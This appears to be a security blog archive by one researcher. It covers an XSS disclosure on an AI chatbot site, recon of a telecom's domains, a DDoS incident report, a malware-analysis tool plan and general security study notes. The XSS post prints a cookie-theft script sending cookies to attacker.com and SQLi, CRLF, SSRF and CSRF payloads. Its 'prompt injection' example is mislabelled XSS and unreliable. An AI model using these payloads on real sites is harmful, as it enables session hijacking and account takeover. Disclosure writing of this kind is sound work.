Hi, I'm Warren, alias WarrenMu. As a cybersecurity enthusiast and researcher, I am always on the lookout for potential vulnerabilities in web applications. Recently, during one of my routine checks, I discovered a critical vulnerability in the chat-bot (LLM) interface of Neexa.ai, this was all due to a serious burnout on hacking on openai without getting any bugs. Lol.. This blog post aims to walk you through the discovery, reporting process, and lessons learned, all while raising awareness about the importance of web security and ethical hacking.

What is Reflected XSS?

Cross-Site Scripting (XSS) is a common vulnerability that occurs when an attacker can inject malicious scripts into webpages viewed by other users. Reflected XSS happens when the injected script is reflected off a web server, such as in an error message, search result, or any other response including some or all of the input sent to the server.

Discovery of the Vulnerability

While exploring the functionalities of neexa.ai’s LLM, I noticed a peculiar behavior in the way user input was being handled. Here’s a step-by-step account of how I identified the vulnerability:

1. Initial Observation

I was testing the input fields on the LLM interface for common injection patterns. One of the fields seemed to echo back user input without proper sanitization.

2. Crafting the Payload

To confirm my suspicions, I crafted a simple payload: <script>alert('XSS')</script>. This script would trigger a browser alert if executed.

3. Injecting the Payload

I injected the payload into the input field and submitted the form. To my surprise, the alert box popped up, confirming the presence of a reflected XSS vulnerability.

4. Further Testing

To understand the extent of the vulnerability, I conducted further tests with more complex payloads. All tests confirmed that the input was not being properly sanitized or encoded, making it possible to execute arbitrary scripts.

Reporting the Vulnerability

As a responsible security researcher, I promptly reported the vulnerability to neexa.ai. Here’s a summary of the report I submitted:

Vulnerability Report: Reflected XSS in Neexa.ai LLM

Date: 1/6/2024

Reporter: WarrenMu

Affected Component: Large Language Model (LLM) Interface

Description: A reflected XSS vulnerability was discovered in the LLM interface of Neexa.ai. An attacker can inject malicious scripts through input fields, which are then reflected back in the response without proper sanitization.

Steps to Reproduce:

1. Navigate to the LLM interface.

2. Enter the following payload in the input field: <script>alert('XSS')</script>

3. Submit the form.

4. Observe the alert box, indicating that the script was executed.

Impact: Exploiting this vulnerability allows attackers to execute arbitrary scripts in the context of the user’s browser, potentially leading to session hijacking, data theft, and other malicious activities.

Recommendation: Implement proper input validation and output encoding to prevent the execution of injected scripts. Use libraries and frameworks that automatically handle XSS protection.

The Aftermath

Despite promptly reporting the vulnerability, the response from neexa.ai was less than satisfactory. While they eventually fixed the issue, there was a lack of acknowledgment and appreciation for my efforts. Instead, I felt my findings were used without proper credit, highlighting a common challenge faced by many in the bug bounty and security research community. Well I'm thankful to Ethan who had good communication skill and tried to mediate while i faced a challenge of explaining the impact to Simon, also he's part of the company, [I speculate] who ended up being a showoff without any security deeper knowledge, he said its not a bug but reputation ruined? I think that's a threat. Well either way I blogged to expose this heartlessness. Hehehe, I mean, hey... I didn't do evil here.

Chaining XSS with Other Vulnerabilities

While a reflected XSS vulnerability on its own can be serious, the potential impact becomes critical when chained with other vulnerabilities. Here are some scenarios demonstrating the severity:

1. Chaining XSS with SQL Injection

Scenario: An attacker uses the XSS vulnerability to steal session cookies and impersonate an admin user. With admin access, they find a vulnerable admin panel that is susceptible to SQL Injection.

Example:

1. Stealing Cookies via XSS:

    <script>fetch('http://attacker.com/steal-cookies?cookie=' + document.cookie);</script>
   

2. Using Admin Session for SQL Injection:

    http://neexa.ai/admin?user_id=1' OR '1'='1
   

Impact: The attacker can execute arbitrary SQL commands, leading to database dumping, data modification, or even complete database control.

2. Chaining XSS with CRLF Injection

Scenario: The attacker uses XSS to inject a CRLF payload, enabling HTTP response splitting and cache poisoning.

Example:

1. XSS Payload:

    <script>
    fetch('http://neexa.ai/vulnerable-endpoint?header=Content-Length:%200%0d%0a%0d%0a<script>alert(1)</script>');
    </script>
   

Impact: This can lead to the injection of arbitrary HTTP headers and body content, potentially compromising the integrity of web cache and leading to further attacks.

3. Chaining XSS with SSRF

Scenario: The attacker uses XSS to perform Server-Side Request Forgery (SSRF), forcing the server to make requests to internal or external services.

Example:

1. XSS Payload:

    <script>
    fetch('http://neexa.ai/vulnerable-endpoint?url=http://localhost/admin');
    </script>
   

Impact: This could allow the attacker to access internal systems, sensitive endpoints, or even manipulate server-side applications.

4. Chaining XSS with CSRF

Scenario: The attacker combines XSS with Cross-Site Request Forgery (CSRF) to perform actions on behalf of an authenticated user.

Example:

1. XSS Payload:

    <script>
    var img = new Image();
    img.src = "http://neexa.ai/change-password?new_password=hacked";
    </script>
   

Impact: The attacker can perform unauthorized actions such as changing the user's password, making purchases, or altering account settings.

5. Prompt Injection Leading to RCE

Scenario: The attacker uses prompt injection in the LLM interface to execute arbitrary code on the server.

Example:

1. Prompt Injection Payload:

    <script>
    fetch('http://neexa.ai/vulnerable-endpoint?prompt=<img src=x onerror=alert(document.cookie) />');
    </script>
   

Impact: If the LLM executes commands based on user input, this could lead to Remote Code Execution (RCE), giving the attacker control over the server and access to sensitive data.

Conclusion

This hypothetical scenario demonstrates how a seemingly minor XSS vulnerability can escalate to a critical security breach when chained with other vulnerabilities like SQL Injection, CRLF Injection, SSRF, CSRF, and prompt injection leading to RCE. It underscores the importance of thorough security assessments and prompt patching of all identified vulnerabilities. N.B: all users of this chatbot would be at a risk i.e. Refactory link.

Lessons Learned

1. Documentation and Proof: Always document your findings thoroughly. Screenshots, videos, and detailed steps can be invaluable when reporting vulnerabilities.

2. Ethical Reporting: Adhere to ethical guidelines and responsible disclosure policies. This not only protects you legally but also fosters a culture of trust and cooperation.

3. Community Support: Engage with the cybersecurity community. Platforms like Bugcrowd, HackerOne, and forums like Reddit can offer support and advice.

4. Raise Awareness: Sharing your experiences through blogs and talks helps educate others and raises awareness about cybersecurity issues.

Conclusion

Discovering and responsibly reporting vulnerabilities is a crucial part of improving web security. While the journey can sometimes be challenging and underappreciated, the impact of your work in safeguarding users and systems is invaluable. By sharing my experience, I hope to inspire and educate fellow bug bounty hunters and security researchers.

If you have any questions or want to share your own experiences, feel free to leave a comment or reach out to me on twitter or email below.

Stay safe and happy hunting!

About the Author:

Twitter/X: WarrenMu__

Email: WarrenMu

Join me on an exciting journey as we uncover the intricacies of Airtel Uganda's digital infrastructure, with a focus on ethical reconnaissance and responsible disclosure.

Chapter 1: Charting the Digital Landscape Equipped with Subfinder, a tool for domain reconnaissance, I began our expedition by mapping out Airtel Uganda's digital footprint. Each domain uncovered served as a starting point for our exploration, leading us deeper into the realm of cyberspace.

subfinder -d airtel.ug -silent

Chapter 2: Navigating the Cybernetic Frontier Utilizing HTTPX, a versatile tool for endpoint discovery, we traversed the vast expanse of Airtel Uganda's digital domain. With each endpoint identified, we gained valuable insights into the structure and vulnerabilities of their network.

httpx -l subdomains.txt -silent

Chapter 3: Delving Deeper with Responsible Fuzzing Driven by a desire for comprehensive exploration, we employed live subdomain fuzzing techniques to uncover hidden entry points and potential vulnerabilities. Through careful and responsible experimentation, we expanded our understanding of Airtel Uganda's digital infrastructure.

ffuf -w subdomains.txt -u FUZZ.example.co.ug -mc all -ac -recursion -recursion-depth 2 -o fuzz_results.txt

Chapter 4: Discovery and Ethical Considerations Amidst our exploration, we stumbled upon an intriguing endpoint [*****/tickets/setup/install.php] that granted access to a ticketing software installation, including administrative privileges. Recognizing the importance of ethical conduct, we refrained from exploiting this discovery and instead focused on documenting our findings for responsible disclosure.

Conclusion: As digital explorers, it is incumbent upon us to tread the cybernetic frontier with integrity and responsibility. Through ethical reconnaissance and principled disclosure, we play a vital role in bolstering digital security and fostering transparency in the digital era. While Airtel Uganda may not offer bug bounties, our commitment to ethical principles guided our actions. Instead of exploiting the discovered endpoint, we patiently waited until it was secured, ensuring that no harm befell their digital infrastructure. Now, with the endpoint fortified and our findings documented, we can share our journey with the world, shedding light on the importance of ethical hacking practices. Join us as we continue to explore, discover, and uphold the values of ethical hacking in our ongoing quest for a safer digital landscape.

WarrenMu @Twitter

WarrenMu @GitHub

The recent infrastructural attack on Kenya orchestrated by the hacker group Anonymous Sudan has raised significant concerns about the vulnerability of critical systems in the digital age. In this comprehensive blog, we explore the motives behind the attack, how it was carried out, and its profound impact on Kenya's economy, public services, and cybersecurity landscape.

The Motives Behind the Attack:

Before we get to the motives, Who is Anonymous Sudan?
Let's dive right in: Anon Sudan as I love to call it, is a decentralized and loosely organized hacktivist group claiming to be associated with the larger Anonymous collective. Anonymous is known for advocating social justice, freedom of speech, and political change through various cyber-attacks and online protests.

As for Anonymous Sudan, specific information about its formation, exact objectives, and historical activities is limited and might be challenging to ascertain. But there are suspicions that the group might be a front for a Russian cybercrime gang, blurring the lines between hacktivism and cybercriminal activity.

Some of their prominent attacks as of this writing include Microsoft, where the giant corporation reported “surges in traffic against some services that temporarily impacted availability” to the “ongoing DDoS activity by the threat actor that Microsoft tracked as Storm-1359.” Not forgetting another DDOS attack on Nigerian tech infrastructure as well late last month.

Back to the motives of the attack;

Anonymous Sudan claimed that its attack on Kenya was in response to Kenya's alleged interference in Sudanese affairs and public statements doubting the sovereignty of the Sudanese government. This highlights how cyberattacks can transcend national boundaries and be used as tools for political retaliation and expression of dissent.

The Attack Method: Distributed Denial of Service (DDoS)

Anonymous Sudan utilized the well-known method of Distributed Denial of Service (DDoS) to cripple Kenya's critical online services. DDoS attacks involve flooding online platforms with a massive volume of traffic, overwhelming the system's capacity and causing it to go offline or become extremely slow.

The group had previously deployed similar DDoS attacks against Microsoft services as I earlier noted, demonstrating its proficiency in using this method to disrupt digital operations. This technique allows hackers to make targeted attacks on specific critical endpoints, maximizing the impact on the targeted systems.

The Crippling Effects of the Cyberattack:

The DDoS attacks launched by Anonymous Sudan had devastating consequences for Kenya's digital infrastructure and the daily lives of its citizens. The attacks resulted in the following disruptions:

1. E-Citizen Platform: The country's e-Citizen platform, which offers access to numerous government services, faced severe interruptions due to the attack. Services such as visa applications and business registrations became unavailable, hindering citizens' interactions with the government.

2. Mobile Payment System: M-Pesa, a widely used mobile transaction system in Kenya, experienced outages during the cyberattack. This disrupted payment processes for businesses and citizens, impacting the country's economy and financial stability.

3. Utility Services: The attack affected essential services such as buying electricity tokens, leaving citizens without access to electricity top-ups and causing disruptions in daily life.

4. Rail Network: The country's rail network also suffered disruptions due to an IT supplier's network outage caused by the attack, leading to ticketing issues for commuters.

The Implications for Kenya's Cybersecurity Landscape:

The infrastructural attack by Anonymous Sudan exposed vulnerabilities in Kenya's cybersecurity infrastructure and raised concerns about the country's preparedness to defend against sophisticated cyber threats. While the Kenyan government has confirmed that no personal data was compromised, the attack revealed the potential weaknesses in the nation's digital defenses.

In response to the attack, the Kenyan government was forced to deploy technical teams to mitigate the impact and block the multiple source IP addresses of the attacks. This incident highlighted the importance of continuous monitoring, threat detection, and proactive cybersecurity measures to safeguard critical infrastructures from future attacks.

Conclusion:

The infrastructural attack carried out by Anonymous Sudan on Kenya underscored the far-reaching consequences of cyber threats on a nation's economy, public services, and citizens' daily lives. The motives behind the attack highlight how geopolitical tensions and political statements can manifest in cyberspace, leading to potentially crippling cyberattacks.

To strengthen cybersecurity, governments must invest in robust defense mechanisms, international cooperation to combat cybercrime, and proactive measures to identify and neutralize cyber threats. Additionally, raising public awareness about the significance of cybersecurity and promoting a culture of cyber hygiene will play a pivotal role in safeguarding nations from such attacks in the future.

The goal of this project is to build a tool that can analyze executable files for potential malware behavior. The tool will be built using Python and C programming languages and will utilize libraries such as PyInstaller and libemu.

2. Design

The tool will be designed with the following modules:

• User interface module: provides a user-friendly interface for the user to interact with the tool.

• File parsing module: parses the executable file and extracts relevant data, such as API calls and system calls.

• Malware analysis module: identifies potential malware behavior by analyzing the data extracted from the file parsing module.

The tool will utilize the following algorithms and techniques:

• Signature matching: compares the API calls and system calls extracted from the file parsing module to a database of known malware signatures.

• Behavior analysis: analyzes the system call patterns and identifies potential malware behavior, such as code injection or network communication.

3. Implementation

The tool will be implemented with the following features:

• User interface: built using the PyQt5 library, providing a user-friendly interface for the user to select the executable file and view the results.

• File parsing module: built using the PyInstaller library, extracting the relevant data from the executable file.

• Malware analysis module: built using the libemu library, identifying potential malware behavior based on the extracted data.

Here is an overview of the implementation process:

1. The user selects the executable file to analyze using the user interface.

2. The file parsing module extracts the relevant data from the executable file.

3. The malware analysis module analyzes the extracted data and identifies potential malware behavior.

4. The results are displayed to the user in the user interface.

4. Testing

The tool will be tested using the following methods:

• Unit tests: test each module independently to ensure that it functions as expected.

• Integration tests: test the tool as a whole to ensure that it identifies potential malware behavior accurately and effectively.

• Test on a variety of executable files: test the tool on a variety of executable files, including benign and malicious files, to ensure that it is accurate and effective.

5. Results

The tool will present the results in the following format:

• Malware behavior identified: a list of potential malware behavior identified by the tool, including code injection or network communication.

• Malware type identified: if the tool matches a known malware signature, it will identify the type of malware.

6. Conclusion

This project has successfully built a tool that can analyze executable files for potential malware behavior. The tool utilizes Python and C programming languages, and libraries such as PyInstaller and libemu. The tool accurately identifies potential malware behavior using algorithms such as signature matching and behavior analysis. The tool has been tested on a variety of executable files, including benign and malicious files, and is effective in identifying potential malware behavior.

Project Structure

1. README.md: A file containing a brief overview of the project, its purpose, and any relevant information.

2. requirements.txt: A file containing a list of Python packages required to run the project.

3. setup.py: A script to build and install the C binary for the project.

4. src/: A directory containing the source code for the project.

   1. file_parser.py: A Python module to parse the executable file and extract relevant data, such as API calls and system calls.

   2. malware_analysis.py: A Python module to identify potential malware behavior by analyzing the data extracted from the file parsing module.

   3. user_interface.py: A Python module to provide a user-friendly interface for the user to interact with the tool.

   4. main.c: A C file to implement the malware analysis algorithm, utilizing the libemu library.

   5. Makefile: A makefile to compile and build the C binary for the project.

5. tests/: A directory containing the unit tests for the project.

6. data/: A directory containing any data files required by the project, such as a database of known malware signatures.

Getting Started

1. Clone the project from the git repository.

2. Install the required Python packages by running pip install -r requirements.txt.

3. Build and install the C binary by running python setup.py build and python setup.py install.

4. Run the project by executing python src/user_interface.py.

5. Test the project by running the unit tests in the tests/ directory.

This project structure provides a starting point for building a malware analysis tool using Python and C. It includes separate modules for file parsing, malware analysis, and user interface, as well as a C binary implementing the malware analysis algorithm. The project structure also includes a Makefile to compile and build the C binary, and a set of unit tests to ensure the functionality of the project. With this structure, you can develop the tool to completion by implementing the malware analysis algorithm and integrating it with the user interface and file parsing modules.

Github link to the project : Feel free to fork and contribute as it will be pushed to the oscakampala open source community GitHub when it's finally working.

Welcome. Today we are going to continue with gracenolan notes. Please do some further deep-diving in web application pen-testing as there are many technical details to understand and practical workouts. Am writing according to the notes.

Mitigations:

mitigations are strategies or techniques employed to reduce or prevent the impact of security threats such as cyber-attacks. The list you provided includes various types of mitigations, including:

1. Patching: Patching involves fixing known vulnerabilities or weaknesses in software systems by updating them with the latest security patches. This helps to prevent attackers from exploiting known vulnerabilities.

2. Data Execution Prevention (DEP): DEP is a security feature that prevents the execution of code from data pages in memory, which helps to prevent certain types of attacks, such as buffer overflows.

3. Address Space Layout Randomization (ASLR): ASLR is a security technique that randomly arranges the memory layout of an application, making it harder for attackers to locate and exploit specific areas of memory, such as those used in buffer overflow attacks.

4. Principle of least privilege: The principle of least privilege is a security concept that advocates for limiting access to resources and privileges only to the extent necessary for users or applications to perform their functions. This reduces the potential for attackers to gain elevated privileges and carry out malicious actions.

5. Code signing: Code signing involves digitally signing software or firmware components to verify their authenticity and integrity. This helps to prevent unauthorized code from running on a system and reduces the risk of malicious code execution.

6. Compiler security features: Some compilers include security features that can detect and prevent buffer overflow vulnerabilities during the compilation process, such as stack canaries or bounds checking.

7. Encryption: Encryption involves encoding data or software/firmware components to prevent unauthorized access or modification. This can be used to protect sensitive data or prevent tampering with critical system components.

8. Mandatory Access Controls (MACs): are security mechanisms that control access to resources based on a set of predefined rules or policies. This ensures that only authorized users or processes can access or modify specific resources, such as files, directories, or network services.

9. Access Control Lists (ACLs): are a type of MAC that define a list of permissions associated with a particular resource, such as a file or directory. These permissions determine who can access or modify the resource, and what actions they are allowed to perform.

10. Operating systems with Mandatory Access Controls, such as SELinux (Security-Enhanced Linux), are designed to provide an additional layer of security by enforcing strict access control policies and preventing unauthorized access or modification of critical system resources.

11. "Insecure by exception" refers to the practice of allowing users to perform certain actions or access certain resources based on exceptions to established security policies. This can lead to security vulnerabilities and compromise the overall security of a system. Instead, it is recommended to establish and enforce strict security policies and only make exceptions when necessary.

12. Finally, it is important not to blame the user for security issues. Instead, security should be designed to be user-friendly and easy to use, while still providing effective protection against threats. By building technology that people can trust, we can create a more secure and resilient digital ecosystem.

These mitigations can be used in combination to provide layers of protection against various types of attacks.

Cryptography, Authentication, Identity:

Encryption, encoding, hashing, obfuscation, and signing are all techniques used in cryptography to protect data, but they are used for different purposes and provide different levels of security:

• Encryption: This is the process of converting plaintext into ciphertext using an encryption algorithm and a secret key. The ciphertext can only be decrypted back to the original plaintext using the same secret key. Encryption is used to protect data in transit or at rest.

• Encoding: This is the process of converting data from one format to another format. Encoding does not provide any security or protection and can often be reversed easily.

• Hashing: This is the process of converting any input (plaintext or ciphertext) into a fixed-length string of characters, called a hash. Hashing is a one-way process, meaning that it is difficult (ideally impossible) to derive the original input from the hash. Hashing is often used to store passwords securely.

• Obfuscation: This is the process of making data or codes more difficult to understand or read. Obfuscation does not provide any security or protection and can often be reversed with enough effort.

• Signing: This is the process of attaching a digital signature to a message or document to prove the authenticity and integrity of the message or document. A digital signature is generated using a private key and can only be verified using the corresponding public key. Signing is often used to ensure the integrity and authenticity of digital documents.

Various attack models, such as the chosen-plaintext attack, refer to different methods that an attacker can use to try to compromise the security of a cryptographic system. For example, a chosen-plaintext attack involves an attacker being able to choose the plaintext input to an encryption algorithm and observing the resulting ciphertext output. This can be used to try to derive the secret key or other sensitive information.

As for encryption standards and implementations, some commonly used ones include:

• RSA (asymmetric encryption)

• AES (symmetric encryption)

• ECC (elliptic curve cryptography, including ed25519)

• Chacha/Salsa (symmetric encryption)

Asymmetric encryption, such as RSA and ECC, involves using a public key and a private key to encrypt and decrypt data. Asymmetric encryption is slower than symmetric encryption, but it is more secure and is often used to establish a trusted connection or transfer a shared secret key.

Symmetric encryption, such as AES and Chacha/Salsa, uses a single shared secret key to encrypt and decrypt data. Symmetric encryption is faster than asymmetric encryption, but it requires the secure sharing of the secret key. Many cryptographic protocols use a combination of both asymmetric and symmetric encryption, such as using asymmetric encryption to establish a secure connection and then using symmetric encryption for the actual data transfer.

Perfect forward secrecy (PFS) is a property of some cryptographic protocols that ensures that even if an attacker can compromise the secret key used for symmetric encryption, they cannot use that key to decrypt past communications. This is achieved by using a different symmetric key for each communication session. PFS is used in some secure messaging applications, such as Signal.

Cryptography, Authentication, and Identity are all important concepts in computer security. Let me provide a brief overview of the concepts you mentioned.

Cryptography:

Encryption vs Encoding vs Hashing vs Obfuscation vs Signing: Encryption, encoding, hashing, obfuscation, and signing are all different techniques used in cryptography to achieve different security goals. Encryption is the process of converting plain text into cipher text using a key, making it unreadable by unauthorized parties. Encoding, on the other hand, is the process of converting data into a particular format that is usable by systems, but it doesn't provide any security. Hashing is the process of transforming data into a fixed-length string that is unique to the input data. Obfuscation is the process of making code or data difficult to understand or read. Signing is the process of attaching a digital signature to a message, which can verify the authenticity of the message and the sender.

Asymmetric vs symmetric: Asymmetric encryption is slow but good for establishing a trusted connection, while symmetric encryption is faster and uses a shared key. Many protocols use asymmetric encryption to transfer a symmetric key, which is then used for the actual data encryption. Perfect forward secrecy is a concept where even if the symmetric key is compromised, it cannot be used to decrypt previously encrypted data.

Ciphers:

Block vs stream ciphers: Block ciphers encrypt data in fixed-size blocks, while stream ciphers encrypt data one bit or byte at a time.

Block cipher modes of operation: Block ciphers can be used in various modes of operation to achieve different security goals, such as confidentiality, integrity, and authenticity. Some popular modes of operation include ECB, CBC, OFB, and CTR.

AES-GCM: AES-GCM is a block cipher mode of operation that combines the AES block cipher with the Galois/Counter Mode (GCM) of operation for authenticated encryption with associated data (AEAD).

Integrity and authenticity primitives:

Hashing functions, MACs, and HMACs are all primitives used for data integrity and authenticity.

Hashing functions: Hashing functions are used to create a fixed-length "fingerprint" of data. Common hashing functions include MD5, SHA-1, and BLAKE.

MACs and HMACs: MACs (Message Authentication Codes) and HMACs (Keyed-hash Message Authentication Codes) are used to verify the integrity and authenticity of data. They use a shared secret key to create a "tag" that is attached to the data, which can be verified by the receiver.

Entropy:

PRNGs, entropy buffer draining, and methods of filling entropy buffers are all concepts related to generating random data in a computer system.

PRNGs: PRNGs (Pseudo Random Number Generators) are used to generate random data in computer systems. They are deterministic algorithms that use a seed value to generate random-looking data.

Entropy buffer draining: Entropy buffer draining is the process of using up the random data available in the system's entropy pool. This can cause problems with cryptographic operations that require random data.

Methods of filling entropy buffer: There are several methods for filling the entropy buffer, including mouse movements, keyboard timings, network timings, and hardware events.

Authentication:

Certificates, TPMs, O-Auth, Auth Cookies, Sessions, SAMLv2, OpenID, Kerberos, Biometrics, Password Management, U2F/FIDO, and multi-factor auth methods are all different concepts related to authentication.

Malware & Reversing:

Malware is a type of software that is designed to harm or exploit computer systems, often for financial gain. Malware can come in many forms, such as viruses, worms, Trojans, spyware, ransomware, and more. Here are some key topics related to malware:

Interesting malware:

• Conficker: A worm that spread rapidly in 2008 and infected millions of computers around the world, exploiting a vulnerability in Windows operating systems.

• Morris worm: One of the first worms to gain widespread attention, created by a graduate student in 1988 to demonstrate the potential risks of networked computers.

• Zeus malware: A Trojan horse that targets online banking systems, stealing login credentials and financial information from infected machines.

• Stuxnet: A highly sophisticated worm that targeted industrial control systems, believed to be created by a nation-state to damage Iranian nuclear facilities.

• Wannacry: A ransomware attack that spread globally in 2017, using a vulnerability in Windows operating systems to encrypt data on infected machines.

• CookieMiner: A malware that targets macOS systems to steal sensitive information from cryptocurrency exchanges and users.

• Sunburst: A supply chain attack that affected many organizations, including U.S. government agencies, by compromising the SolarWinds software.

Malware features:

• Remote code execution: Techniques for getting malicious code to run on a target system.

• Domain-flux and Fast-Flux: Techniques for changing the IP addresses of C2 servers to evade detection and takedowns.

• Covert C2 channels: Techniques for hiding the communication between malware and C2 servers, such as using legitimate network protocols or hiding data in images.

• Evasion techniques: Techniques for avoiding detection and analysis by security software or researchers, such as checking for the presence of sandboxes or VMs.

• Process hollowing: A technique for creating a new process in a suspended state and then replacing its memory with malicious code, to evade detection by antivirus software.

• Mutexes: A technique for preventing multiple instances of malware from running on the same system.

• Multi-vector and polymorphic attacks: Techniques for using multiple attack vectors and changing the appearance of the malware to evade detection and analysis.

• RAT (remote access trojan) features Capabilities for remote control of infected machines, such as keylogging, screen capture, and file transfer.

Decompiling/reversing:

• Obfuscation of code and unique strings: Techniques for hiding the true purpose and behavior of malware, such as using random variable names or encrypting strings.

• IdaPro, Ghidra: Reverse engineering tools for analyzing malware code and behavior.

Static and dynamic analysis are two approaches used to analyze software or code for security vulnerabilities and potential threats.

Static analysis involves examining the code without executing it, to identify security flaws or other issues that may be present. This is done by examining the source code, byte code, or machine code of the program. This approach can be automated and is often used to scan large codebases for common vulnerabilities, such as buffer overflows or SQL injection.

Dynamic analysis, on the other hand, involves running the software in a controlled environment to observe its behavior and identify any issues that may arise during runtime. This approach involves executing the code and observing its interactions with the operating system, network, and other resources. This approach can be useful for detecting issues that may not be apparent during static analysis, such as runtime errors, memory leaks, or other issues related to program execution.

VirusTotal, Reverse.it, and Hybrid Analysis are all online services that provide both static and dynamic analysis of software and code. These services allow users to submit files or URLs for analysis and provide reports on any potential security threats or issues that may be present. They also use machine learning and other advanced techniques to identify potential threats and vulnerabilities in code.

Exploits:

Social engineering attacks aim to trick people into performing certain actions that can harm the security of the system or the data stored within it. Common social engineering attacks include phishing, spear phishing, baiting, and tailgating.

Physical attacks target the physical security of the system or data and often involve gaining physical access to the system or device. Such attacks can be mitigated by using disk encryption, trusted platform modules, and other security mechanisms.

Network attacks involve finding vulnerabilities in networked systems and exploiting them to gain unauthorized access. Attackers use tools like Nmap, Metasploit, and Shodan to scan networks, search for vulnerabilities, and launch attacks.

Exploit kits and drive-by download attacks are typically used to distribute malware to unsuspecting victims through infected websites or emails.

Remote control attacks involve taking control of a remote system, typically through a vulnerability or exploit. These attacks can lead to remote code execution and privilege escalation.

Spoofing attacks involve impersonating a legitimate entity to gain unauthorized access or launch attacks. Spoofing can be done for email, IP addresses, MAC addresses, and biometric data.

Tools like Metasploit, ExploitDB, Shodan, and Hak5 are used by security researchers and attackers alike to find and exploit vulnerabilities. It's important to note that using such tools for unauthorized purposes is illegal and can lead to severe legal consequences.

Attack Structure:

1. Reconnaissance: The attacker gathers information about the target, often through open-source intelligence (OSINT) methods like Google Dorking or using tools like Shodan to identify vulnerable systems.

2. Resource development: The attacker builds the infrastructure and tools needed for the attack, which may include creating malware or obtaining access to compromised systems.

3. Initial access: The attacker gains access to the target network or system, often through methods like phishing or exploiting public-facing applications.

4. Execution: The attacker runs code on the compromised system, often through shells or interpreters like PowerShell or Python.

5. Persistence: The attacker establishes a foothold in the compromised system by creating backdoors and modifying startup scripts.

6. Privilege escalation: The attacker elevates their access privileges on the compromised system, often through methods like a token or key theft.

7. Defense evasion: The attacker attempts to evade detection and defensive measures, such as disabling logging or reverting virtual machines.

8. Credential access: The attacker gains access to login credentials, often through methods like brute-forcing or keylogging.

9. Discovery: The attacker explores the target system and network, looking for other vulnerable systems or sensitive information.

10. Lateral movement: The attacker moves laterally through the network, compromising additional systems and accounts.

11. Collection: The attacker steals valuable information or data, often through methods like capturing audio or video, database dumps, or intercepting network traffic.

12. Exfiltration: The attacker removes stolen data from the target network, often through covert channels like DNS exfiltration or cloud backup services.

13. Command and control: The attacker maintains communication with the compromised systems, often through encrypted channels or removable media.

14. Impact: The attacker achieves their objectives, which may include data theft, data destruction, or disruption of services.

Threat Modeling:

The Threat Matrix is a tool used to map out and visualize the different types of threats facing an organization. It is often used as part of a risk assessment process to identify and prioritize the most critical risks. The matrix typically includes different threat categories along one axis (such as natural disasters, human error, cyber attacks, etc.) and the potential impacts along the other axis (such as financial losses, reputational damage, legal/regulatory penalties, etc.).

Trust boundaries refer to the points in a system where different levels of trust exist, and where security controls are typically implemented to protect the system. For example, a trust boundary might exist between an organization's internal network and the public Internet, or between different parts of an application that handle sensitive data and those that do not.

Security controls are measures put in place to protect systems, data, and other assets from threats. These can include technical controls such as firewalls, intrusion detection systems, and encryption, as well as administrative controls such as policies, procedures, and employee training.

The STRIDE framework is a tool for identifying and categorizing potential threats to software systems. The six threat categories in the framework are Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege.

The MITRE ATT&CK framework is a knowledge base of adversary tactics and techniques based on real-world observations of cyber attacks. It is organized into different categories of tactics, such as initial access, execution, persistence, and exfiltration, and includes specific techniques associated with each tactic.

Lilly Ryan's "Defense Against the Dark Arts" talk is a presentation on information security that uses examples from the Harry Potter series to explain concepts such as threat modeling, incident response, and risk management. It is a creative and engaging way to introduce people to these important security concepts.

Detection:

1. IDS: An Intrusion Detection System is a security system that detects unauthorized access to a network or computer system. It can be signature-based or behavior-based and uses rules to identify potential security threats.

2. SIEM: Security Information and Event Management is a technology that provides real-time analysis of security alerts generated by network hardware and applications. It collects and correlates data from multiple sources, allowing for the detection of complex security incidents.

3. IOC: Indicator of Compromise is a piece of forensic data that suggests that a system has been hacked or compromised. It may include information such as IP addresses, file names, or other artifacts.

4. Honeypots: A honeypot is a decoy system set up to attract and detect hackers. It can be a server or a network of servers designed to mimic a legitimate system, gather information about attacks and analyze them.

5. Firewall rules: Firewall rules are used to block or allow traffic based on specific criteria. For example, they can be set up to detect brute-force attacks or port scanning.

6. Anomaly / Behavior-based detection: This is a technique used to detect security threats by monitoring network traffic for patterns that are not typical. It involves developing a baseline of normal network behavior and then identifying deviations from this baseline.

7. Tools for detection: There are various tools used in threat detection such as Splunk, ArcSight, Qradar, Darktrace, Tcpdump, Wireshark, and Zeek.

8. Things to know about attackers: Attackers can use various techniques to evade detection, such as spoofing packets or creating a lot of noise. It can be challenging to correlate IP addresses with physical locations.

9. Logs to look at: Several types of logs can be useful for detecting security threats, including DNS queries, HTTP headers, traffic volume, traffic patterns, and execution logs.

10. A curated list of awesome threat detection resources: This is a list of various resources related to threat detection, such as blogs, tools, and frameworks.

Digital Forensics:

Digital forensics is the process of collecting, preserving, analyzing, and presenting electronic data in a way that is admissible in a court of law. It is often used to investigate computer-related crimes or to recover data that has been lost or delete

• Evidence volatility: different types of evidence (network, memory, disk) have different levels of volatility, which affects how they are collected and analyzed.

• Network forensics: analyzing network traffic, including DNS logs, NetFlow, and sampling rates.

• Disk forensics: analyzing data stored on disk, including disk imaging, filesystems, logs, and data recovery.

• Memory forensics: analyzing data stored in memory, including memory acquisition, memory structures, and tools like Volatility and WinDbg.

• Mobile forensics: analyzing data stored on mobile devices, including differences between mobile and computer forensics, and specific considerations for Android vs. iPhone.

• Anti-forensics: techniques used by malware to try to hide, such as timestamping.

• Chain of custody: documentation and procedures used to maintain the integrity of the evidence, including handover notes.

These concepts and tools are used by digital forensics investigators to collect and analyze electronic evidence in a way that is accurate, reliable, and legally admissible.

Incident Management:

Incident management is the process of responding to and resolving information security or privacy incidents when they occur. It involves a coordinated effort to detect, investigate, contain, and recover from the incident while minimizing damage to the organization.

Some key concepts and best practices in incident management include:

• Understanding the difference between privacy incidents (breaches of personal information) and information security incidents (breaches of company systems or data).

• Knowing when to involve legal, users, managers, and directors in the incident response process.

• Running through different scenarios to understand how an incident might unfold, from start to finish.

• Delegating roles and responsibilities and establishing clear lines of communication between team members.

• Identifying the type of alert triggering the incident and understanding how to find the root cause of the issue.

• Understanding the stages of an attack (such as the cyber-kill chain) and the difference between symptoms and causes.

• Building a timeline of events to identify the scope and impact of the incident.

• Assuming good intent and working collaboratively with people to resolve the issue.

• Developing response models such as SANS' PICERL (Preparation, Identification, Containment, Eradication, Recovery, Lessons learned) or Google's IMAG (Incident Management At Google) to guide the response effort.

Overall, incident management is an essential part of any organization's information security and privacy program. It involves a coordinated effort to detect, respond to, and recover from incidents while minimizing damage to the organization and protecting its assets.

Incident Management:

